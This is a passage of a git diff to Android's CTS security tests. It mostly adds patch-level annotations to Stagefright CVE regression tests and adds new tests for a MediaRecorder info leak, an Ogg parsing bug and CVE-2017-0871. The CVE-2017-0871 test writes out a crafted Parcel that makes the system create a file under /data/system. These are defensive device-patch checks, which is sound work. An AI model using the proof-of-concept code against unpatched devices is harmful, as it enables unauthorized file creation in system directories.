for (String serviceName : RESTRICTED_SERVICES_TO_TEST) {
IBinder service = mService.getSystemService(serviceName);
diff --git a/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java b/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java
new file mode 100644
index 0000000..4252614
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java
@@ -0,0 +1,58 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import android.media.MediaRecorder;
+import android.test.AndroidTestCase;
+
+@SecurityTest
+public class MediaRecorderInfoLeakTest extends AndroidTestCase {
+
+ /**
+ * b/27855172
+ */
+ @SecurityTest(minPatchLevel = "2016-06")
+ public void test_cve_2016_2499() throws Exception {
+ MediaRecorder mediaRecorder = null;
+ try {
+ for (int i = 0; i < 1000; i++) {
+ mediaRecorder = new MediaRecorder();
+ mediaRecorder.setAudioSource(MediaRecorder.AudioSource.DEFAULT);
+ mediaRecorder.setVideoSource(MediaRecorder.VideoSource.SURFACE);
+ mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP);
+ mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AAC);
+ mediaRecorder.setVideoEncoder(MediaRecorder.VideoEncoder.H263);
+ mediaRecorder.setVideoFrameRate(30);
+ mediaRecorder.setVideoSize(352, 288);
+ mediaRecorder.setOutputFile("/sdcard/record.output");
+ mediaRecorder.prepare();
+ int test = mediaRecorder.getMaxAmplitude();
+ mediaRecorder.release();
+ if(test != 0){
+ fail("MediaRecorderInfoLeakTest failed");
+ }
+ }
+ } catch (Exception e) {
+ fail("Media Recorder Exception" + e.getMessage());
+ } finally {
+ if (mediaRecorder != null){
+ mediaRecorder.release();
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
index 3e36fa8..efc050f 100644
--- a/tests/tests/security/src/android/security/cts/Movie33897722.java
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -39,6 +39,7 @@
* larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
* color map, which would be reading memory that we do not control, and may be uninitialized.
*/
+ @SecurityTest(minPatchLevel = "2017-06")
public void test_android_bug_33897722() {
// The image has a 10 x 10 frame on top of a transparent background. Only test the
// 10 x 10 frame, since the original bug would never have used uninitialized memory
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 77d75d8..2e101a5 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -107,7 +107,7 @@
*/
private static native boolean doPerfEventTest2();
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
index a5faa42..609b32d 100644
--- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
@@ -113,7 +113,10 @@
// Test package to verify upgrades to privileged applications
"com.android.cts.priv.ctsshim",
- "com.android.cts.ctsshim"
+ "com.android.cts.ctsshim",
+
+ // Oom Catcher package to prevent tests from ooming device.
+ "com.android.cts.oomcatcher"
));
diff --git a/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java b/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java
new file mode 100644
index 0000000..a024e50
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.test.AndroidTestCase;
+import android.platform.test.annotations.SecurityTest;
+import android.security.cts.R;
+
+import android.content.Context;
+import android.content.Intent;
+import android.os.BaseBundle;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.util.Log;
+
+import java.io.File;
+import java.lang.reflect.Field;
+
+@SecurityTest
+public class ParcelableExceptionTest extends AndroidTestCase {
+
+ @SecurityTest(minPatchLevel = "2017-12")
+ public void test_CVE_2017_0871() throws Exception {
+ String filePath = "/data/system/" + System.currentTimeMillis();
+ File file = new File(filePath);
+ Bundle bundle = createBundle("java.io.FileOutputStream", filePath);
+ sendBundleToSystem(bundle);
+ assertFalse(file.exists());
+ }
+
+ private Bundle createBundle(String className, String constructorArgument) throws Exception {
+ Parcel data = Parcel.obtain();
+ data.writeInt(1);
+ data.writeString("a");
+ data.writeInt(4);
+ data.writeString("android.os.ParcelableException");
+ data.writeString(className);
+ data.writeString(constructorArgument);
+
+ Bundle bundle = new Bundle();
+ Field parcelledDataField = BaseBundle.class.getDeclaredField("mParcelledData");
+ parcelledDataField.setAccessible(true);
+ parcelledDataField.set(bundle, data);
+ return bundle;
+ }
+
+ private void sendBundleToSystem(Bundle theBundle) throws Exception {
+ Context.class
+ .getMethod("sendBroadcast",
+ Intent.class,
+ String.class,
+ Bundle.class)
+ .invoke(getContext(), new Intent("DUMMY_BROADCAST"), null, theBundle);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/PutOverflowTest.java b/tests/tests/security/src/android/security/cts/PutOverflowTest.java
index 9755efa..6f7e8da 100644
--- a/tests/tests/security/src/android/security/cts/PutOverflowTest.java
+++ b/tests/tests/security/src/android/security/cts/PutOverflowTest.java
@@ -22,6 +22,7 @@
@SecurityTest
public class PutOverflowTest extends AndroidTestCase {
+ @SecurityTest(minPatchLevel = "2015-02")
public void testCrash() throws Exception {
try {
Class<?> keystoreClass = Class.forName("android.security.KeyStore");
diff --git a/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java b/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
index 8f6477e..0e698f8 100644
--- a/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
+++ b/tests/tests/security/src/android/security/cts/SSLConscryptPlainTextExposureTest.java
@@ -64,6 +64,7 @@
public static String output = "";
private final String pattern = ".*PLAIN TEXT EXPOSED.*";
+ @SecurityTest(minPatchLevel = "2018-05")
public void test_android_CVE_2017_13309() {
context = getInstrumentation().getContext();
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 31769e1..2b86cb1 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -53,6 +53,12 @@
import java.io.InputStream;
import java.net.URL;
import java.nio.ByteBuffer;
+import java.io.FileOutputStream;
+import java.io.OutputStream;
+import java.io.InputStream;
+import java.net.Socket;
+import java.net.ServerSocket;
+import java.io.File;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.concurrent.locks.Condition;
@@ -79,169 +85,172 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_36725407() throws Exception {
doStagefrightTest(R.raw.bug_36725407);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3829() throws Exception {
doStagefrightTest(R.raw.cve_2016_3829);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_cve_2017_0643() throws Exception {
doStagefrightTest(R.raw.cve_2017_0643);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_cve_2017_0728() throws Exception {
doStagefrightTest(R.raw.cve_2017_0728);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testStagefright_bug_62187433() throws Exception {
doStagefrightTest(R.raw.bug_62187433);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefrightANR_bug_62673844() throws Exception {
doStagefrightTestANR(R.raw.bug_62673844);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_37079296() throws Exception {
doStagefrightTest(R.raw.bug_37079296);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38342499() throws Exception {
doStagefrightTest(R.raw.bug_38342499);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_bug_22771132() throws Exception {
doStagefrightTest(R.raw.bug_22771132);
}
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_bug_21443020() throws Exception {
doStagefrightTest(R.raw.bug_21443020_webm);
}
+ @SecurityTest(minPatchLevel = "2018-03")
public void testStagefright_bug_34360591() throws Exception {
doStagefrightTest(R.raw.bug_34360591);
}
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35763994() throws Exception {
doStagefrightTest(R.raw.bug_35763994);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_33137046() throws Exception {
doStagefrightTest(R.raw.bug_33137046);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2016_2507() throws Exception {
doStagefrightTest(R.raw.cve_2016_2507);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_31647370() throws Exception {
doStagefrightTest(R.raw.bug_31647370);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testStagefright_bug_32577290() throws Exception {
doStagefrightTest(R.raw.bug_32577290);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_1() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_1);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_2() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_2);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_3() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_3);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1538_4() throws Exception {
doStagefrightTest(R.raw.cve_2015_1538_4);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_cve_2015_1539() throws Exception {
doStagefrightTest(R.raw.cve_2015_1539);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3824() throws Exception {
doStagefrightTest(R.raw.cve_2015_3824);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3826() throws Exception {
doStagefrightTest(R.raw.cve_2015_3826);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3827() throws Exception {
doStagefrightTest(R.raw.cve_2015_3827);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3828() throws Exception {
doStagefrightTest(R.raw.cve_2015_3828);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3829() throws Exception {
doStagefrightTest(R.raw.cve_2015_3829);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3836() throws Exception {
doStagefrightTest(R.raw.cve_2015_3836);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3864() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-01")
public void testStagefright_cve_2015_3864_b23034759() throws Exception {
doStagefrightTest(R.raw.cve_2015_3864_b23034759);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_6598() throws Exception {
doStagefrightTest(R.raw.cve_2015_6598);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-12")
public void testStagefright_cve_2016_6766() throws Exception {
doStagefrightTest(R.raw.cve_2016_6766);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_26366256() throws Exception {
doStagefrightTest(R.raw.bug_26366256);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-02")
public void testStagefright_cve_2016_2429_b_27211885() throws Exception {
doStagefrightTest(R.raw.cve_2016_2429_b_27211885);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_34031018() throws Exception {
doStagefrightTest(R.raw.bug_34031018_32bit);
doStagefrightTest(R.raw.bug_34031018_64bit);
@@ -252,32 +261,32 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65123471() throws Exception {
doStagefrightTest(R.raw.bug_65123471);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_bug_72165027() throws Exception {
doStagefrightTest(R.raw.bug_72165027);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testStagefright_bug_65483665() throws Exception {
doStagefrightTest(R.raw.bug_65483665);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_cve_2017_0852_b_62815506() throws Exception {
doStagefrightTest(R.raw.cve_2017_0852_b_62815506);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testStagefright_cve_2017_13229() throws Exception {
doStagefrightTest(R.raw.cve_2017_13229);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2017_0763() throws Exception {
doStagefrightTest(R.raw.cve_2017_0763);
}
@@ -287,430 +296,489 @@
before any existing test methods
***********************************************************/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testBug_73965890() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_73965890_framelen);
doStagefrightTestRawBlob(R.raw.bug_73965890_hevc, "video/hevc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-10")
public void testStagefright_cve_2016_3920() throws Exception {
doStagefrightTest(R.raw.cve_2016_3920);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-06")
public void testStagefright_bug_68953854() throws Exception {
doStagefrightTest(R.raw.bug_68953854, 1 * 60 * 1000);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38448381() throws Exception {
doStagefrightTest(R.raw.bug_38448381);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3821() throws Exception {
doStagefrightTest(R.raw.cve_2016_3821);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_bug_70897454() throws Exception {
doStagefrightTestRawBlob(R.raw.b70897454_avc, "video/avc", 320, 420);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3742_b_28165659() throws Exception {
doStagefrightTest(R.raw.cve_2016_3742_b_28165659);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_35039946() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_35039946_hevc, "video/hevc", 320, 420);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_38115076() throws Exception {
doStagefrightTest(R.raw.bug_38115076);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_34618607() throws Exception {
doStagefrightTest(R.raw.bug_34618607);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testStagefright_bug_69478425() throws Exception {
doStagefrightTest(R.raw.bug_69478425);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65735716() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_65735716_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void testStagefright_bug_65717533() throws Exception {
doStagefrightTest(R.raw.bug_65717533_header_corrupt);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_38239864() throws Exception {
doStagefrightTest(R.raw.bug_38239864, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_cve_2017_0600() throws Exception {
doStagefrightTest(R.raw.cve_2017_0600);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testBug_38014992() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_38014992_framelen);
doStagefrightTestRawBlob(R.raw.bug_38014992_avc, "video/avc", 640, 480, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_35584425() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_35584425_framelen);
doStagefrightTestRawBlob(R.raw.bug_35584425_avc, "video/avc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-11")
public void testBug_31092462() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_31092462_framelen);
doStagefrightTestRawBlob(R.raw.bug_31092462_avc, "video/avc", 1280, 1024, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testBug_34097866() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_34097866_frame_len);
doStagefrightTestRawBlob(R.raw.bug_34097866_avc, "video/avc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33862021() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33862021_frame_len);
doStagefrightTestRawBlob(R.raw.bug_33862021_hevc, "video/hevc", 160, 96, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33387820() throws Exception {
int[] frameSizes = {45, 3202, 430, 2526};
doStagefrightTestRawBlob(R.raw.bug_33387820_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_37008096() throws Exception {
int[] frameSizes = {245, 12, 33, 140, 164};
doStagefrightTestRawBlob(R.raw.bug_37008096_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_34231163() throws Exception {
int[] frameSizes = {22, 357, 217, 293, 175};
doStagefrightTestRawBlob(R.raw.bug_34231163_mpeg2, "video/mpeg2", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_33933140() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33933140_framelen);
doStagefrightTestRawBlob(R.raw.bug_33933140_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_34097915() throws Exception {
int[] frameSizes = {4140, 593, 0, 15495};
doStagefrightTestRawBlob(R.raw.bug_34097915_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_34097213() throws Exception {
int[] frameSizes = {2571, 210, 33858};
doStagefrightTestRawBlob(R.raw.bug_34097213_avc, "video/avc", 320, 240, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testBug_28816956() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_28816956_framelen);
doStagefrightTestRawBlob(R.raw.bug_28816956_hevc, "video/hevc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33818500() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_33818500_framelen);
doStagefrightTestRawBlob(R.raw.bug_33818500_avc, "video/avc", 64, 32, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testBug_64784973() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_64784973_framelen);
doStagefrightTestRawBlob(R.raw.bug_64784973_hevc, "video/hevc", 1280, 720, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_34231231() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_34231231_framelen);
doStagefrightTestRawBlob(R.raw.bug_34231231_mpeg2, "video/mpeg2", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testBug_63045918() throws Exception {
int[] frameSizes = getFrameSizes(R.raw.bug_63045918_framelen);
doStagefrightTestRawBlob(R.raw.bug_63045918_hevc, "video/hevc", 352, 288, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testBug_33298089() throws Exception {
int[] frameSizes = {3247, 430, 221, 2305};
doStagefrightTestRawBlob(R.raw.bug_33298089_avc, "video/avc", 32, 64, frameSizes);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_cve_2017_0599() throws Exception {
doStagefrightTest(R.raw.cve_2017_0599);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_36492741() throws Exception {
doStagefrightTest(R.raw.bug_36492741);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_38487564() throws Exception {
doStagefrightTest(R.raw.bug_38487564, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_37237396() throws Exception {
doStagefrightTest(R.raw.bug_37237396);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2016_0842() throws Exception {
doStagefrightTest(R.raw.cve_2016_0842);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-11")
public void testStagefright_bug_63121644() throws Exception {
doStagefrightTest(R.raw.bug_63121644);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_cve_2016_6712() throws Exception {
doStagefrightTest(R.raw.cve_2016_6712);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testStagefright_bug_34097231() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_34097231_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-05")
public void testStagefright_bug_34097672() throws Exception {
doStagefrightTest(R.raw.bug_34097672);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-03")
public void testStagefright_bug_33751193() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_33751193_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testBug_36993291() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_36993291_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_33818508() throws Exception {
doStagefrightTest(R.raw.bug_33818508);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-08")
public void testStagefright_bug_32873375() throws Exception {
doStagefrightTest(R.raw.bug_32873375);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_bug_25765591() throws Exception {
doStagefrightTest(R.raw.bug_25765591);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-09")
public void testStagefright_bug_62673179() throws Exception {
doStagefrightTest(R.raw.bug_62673179_ts, (4 * 60 * 1000));
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-03")
public void testStagefright_bug_69269702() throws Exception {
doStagefrightTest(R.raw.bug_69269702);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3867() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testStagefright_bug_65398821() throws Exception {
doStagefrightTest(R.raw.bug_65398821, ( 4 * 60 * 1000 ) );
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3869() throws Exception {
doStagefrightTest(R.raw.cve_2015_3869);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-03")
public void testStagefright_bug_23452792() throws Exception {
doStagefrightTest(R.raw.bug_23452792);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-08")
public void testStagefright_cve_2016_3820() throws Exception {
doStagefrightTest(R.raw.cve_2016_3820);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_3741() throws Exception {
doStagefrightTest(R.raw.cve_2016_3741);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
public void testStagefright_cve_2016_2506() throws Exception {
doStagefrightTest(R.raw.cve_2016_2506);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-06")
public void testStagefright_cve_2016_2428() throws Exception {
doStagefrightTest(R.raw.cve_2016_2428);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-07")
+ public void testStagefright_cve_2016_3756() throws Exception {
+ doStagefrightTest(R.raw.cve_2016_3756);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-07")
+ public void testStagefright_bug_36592202() throws Exception {
+ Resources resources = getInstrumentation().getContext().getResources();
+ AssetFileDescriptor fd = resources.openRawResourceFd(R.raw.bug_36592202);
+ final int oggPageSize = 25627;
+ byte [] blob = new byte[oggPageSize];
+ // 127 bytes read and 25500 zeros constitute one Ogg page
+ FileInputStream fis = fd.createInputStream();
+ int numRead = fis.read(blob);
+ fis.close();
+ // Creating temp file
+ final File tempFile = File.createTempFile("poc_tmp", ".ogg", null);
+ try {
+ final FileOutputStream tempFos = new FileOutputStream(tempFile.getAbsolutePath());
+ int bytesWritten = 0;
+ final long oggPagesRequired = 50000;
+ long oggPagesAvailable = tempFile.getUsableSpace() / oggPageSize;
+ long numOggPages = Math.min(oggPagesRequired, oggPagesAvailable);
+ // Repeat data for specified number of pages
+ for (int i = 0; i < numOggPages; i++) {
+ tempFos.write(blob);
+ bytesWritten += oggPageSize;
+ }
+ tempFos.close();
+ final int fileSize = bytesWritten;
+ final int timeout = (10 * 60 * 1000);
+ runWithTimeout(new Runnable() {
+ @Override
+ public void run() {
+ try {
+ doStagefrightTestMediaCodec(tempFile.getAbsolutePath());
+ } catch (Exception | AssertionError e) {
+ if (!tempFile.delete()) {
+ Log.e(TAG, "Failed to delete temporary PoC file");
+ }
+ fail("Operation was not successful");
+ }
+ }
+ }, timeout);
+ } catch (Exception e) {
+ fail("Failed to test b/36592202");
+ } finally {
+ if (!tempFile.delete()) {
+ Log.e(TAG, "Failed to delete temporary PoC file");
+ }
+ }
+ }
+
+ @SecurityTest(minPatchLevel = "2016-11")
public void testStagefright_bug_30822755() throws Exception {
doStagefrightTest(R.raw.bug_30822755);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_32322258() throws Exception {
doStagefrightTest(R.raw.bug_32322258);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_23248776() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_23248776);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-06")
public void testStagefright_bug_35472997() throws Exception {
doStagefrightTest(R.raw.bug_35472997);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_20718524() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_20718524);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testStagefright_bug_34896431() throws Exception {
doStagefrightTest(R.raw.bug_34896431);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-04")
public void testBug_33641588() throws Exception {
doStagefrightTestRawBlob(R.raw.bug_33641588_avc, "video/avc", 320, 240);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3862_b_22954006() throws Exception {
doStagefrightTest(R.raw.cve_2015_3862_b_22954006);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3867_b_23213430() throws Exception {
doStagefrightTest(R.raw.cve_2015_3867_b_23213430);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2015-10")
public void testStagefright_cve_2015_3873_b_21814993() throws Exception {
doStagefrightTest(R.raw.cve_2015_3873_b_21814993);
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2016-04")
public void testStagefright_bug_25812590() throws Exception {
